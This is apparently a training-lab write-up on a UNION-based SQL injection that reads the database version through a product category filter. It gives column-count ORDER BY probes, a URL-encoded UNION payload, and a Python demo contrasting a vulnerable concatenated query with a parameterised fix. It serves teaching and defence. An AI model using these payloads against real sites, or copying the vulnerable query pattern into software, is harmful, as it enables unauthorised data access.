Problem Statement:
This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
Requirement:
Make the database retrieve the string: '8.0.31-0ubuntu0.20.04.2'
Understanding: Different Database Syntax
Database versions:
You can query the database to determine its type and version. This information is useful when formulating more complicated attacks.
Database   | Query
Oracle     | SELECT banner FROM v$version / SELECT version FROM v$instance
Microsoft  | SELECT @@version
PostgreSQL | SELECT version()
MySQL      | SELECT @@version
Comments:
You can use comments to truncate a query and remove the portion of the original query that follows your input.
Database   | Comment syntax
Oracle     | --comment
Microsoft  | --comment, /*comment*/
PostgreSQL | --comment, /*comment*/
MySQL      | #comment, -- comment (note the space after the double dash), /*comment*/
Steps to solve this lab:
Note:
- To solve this lab in the browser itself, we have to URL-encode the # character; otherwise the browser treats # as the start of a URL fragment and does not send it to the server.
- In MySQL we can comment using several methods: --, # or /* */
- First, find out how many columns there are, using the ORDER BY clause.
Crafting the URL: https://0a5e005304714149c2736206009700cf.web-security-academy.net/filter?category=Pets
We are using the # character to comment out the rest of the original query.
Note: the browser will not send a literal # character to the server, so we encode it as %23.
At the end of the URL, append:
- ' ORDER BY 1 %23
- ' ORDER BY 2 %23
This tells us how many columns the original query returns.
- Next, craft the payload to retrieve the version:
' UNION SELECT NULL, @@version %23

This is how the injected query looks on the database side (screenshots in the original post):
- MySQL
- The same command works on Microsoft SQL Server as well, since it also exposes @@version.
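The vulnerable category filter beside its parameterised fix, as an added example that is not part of the original post: a constructed in-memory SQLite stand-in for the product table shows the ORDER BY column-count probe (generalised to count upward until the database rejects the index) and the UNION payload succeeding against string concatenation, and returning nothing against a bound parameter. SQLite has no @@version, so sqlite_version() and the "-- " comment stand in for MySQL's @@version and #.

```python
import sqlite3

# Constructed stand-in for the lab's product listing: an in-memory SQLite table,
# not the lab's real schema. SQLite has no @@version, so sqlite_version() plays
# the role of MySQL's @@version; the "-- " comment replaces MySQL's "#".
LOCAL_SQLITE_VERSION = sqlite3.sqlite_version


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [("Leash", "Pets"), ("Bowl", "Pets"), ("Lamp", "Home")])
    return conn


def filter_vulnerable(conn, category):
    # The bug the lab demonstrates: the category value is spliced into the SQL
    # text, so a quote in it ends the string literal and the rest is parsed as SQL.
    sql = f"SELECT name, category FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


def filter_safe(conn, category):
    # The fix: a bound parameter is sent as data, never parsed as SQL, so the
    # same payloads simply match no category.
    sql = "SELECT name, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def count_columns(conn, query_fn, limit=10):
    # The ORDER BY probe from the walkthrough, generalised: keep raising the
    # column index until the database rejects it. Returns None when no probe
    # errors within the limit, which is what the parameterised endpoint does.
    for n in range(1, limit + 1):
        try:
            query_fn(conn, f"' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    return None


VERSION_PAYLOAD = "' UNION SELECT NULL, sqlite_version() -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable columns:", count_columns(db, filter_vulnerable))  # 2
    print("vulnerable rows:", filter_vulnerable(db, VERSION_PAYLOAD))   # [(None, <sqlite version>)]
    print("safe columns:", count_columns(db, filter_safe))              # None
    print("safe rows:", filter_safe(db, VERSION_PAYLOAD))               # []
```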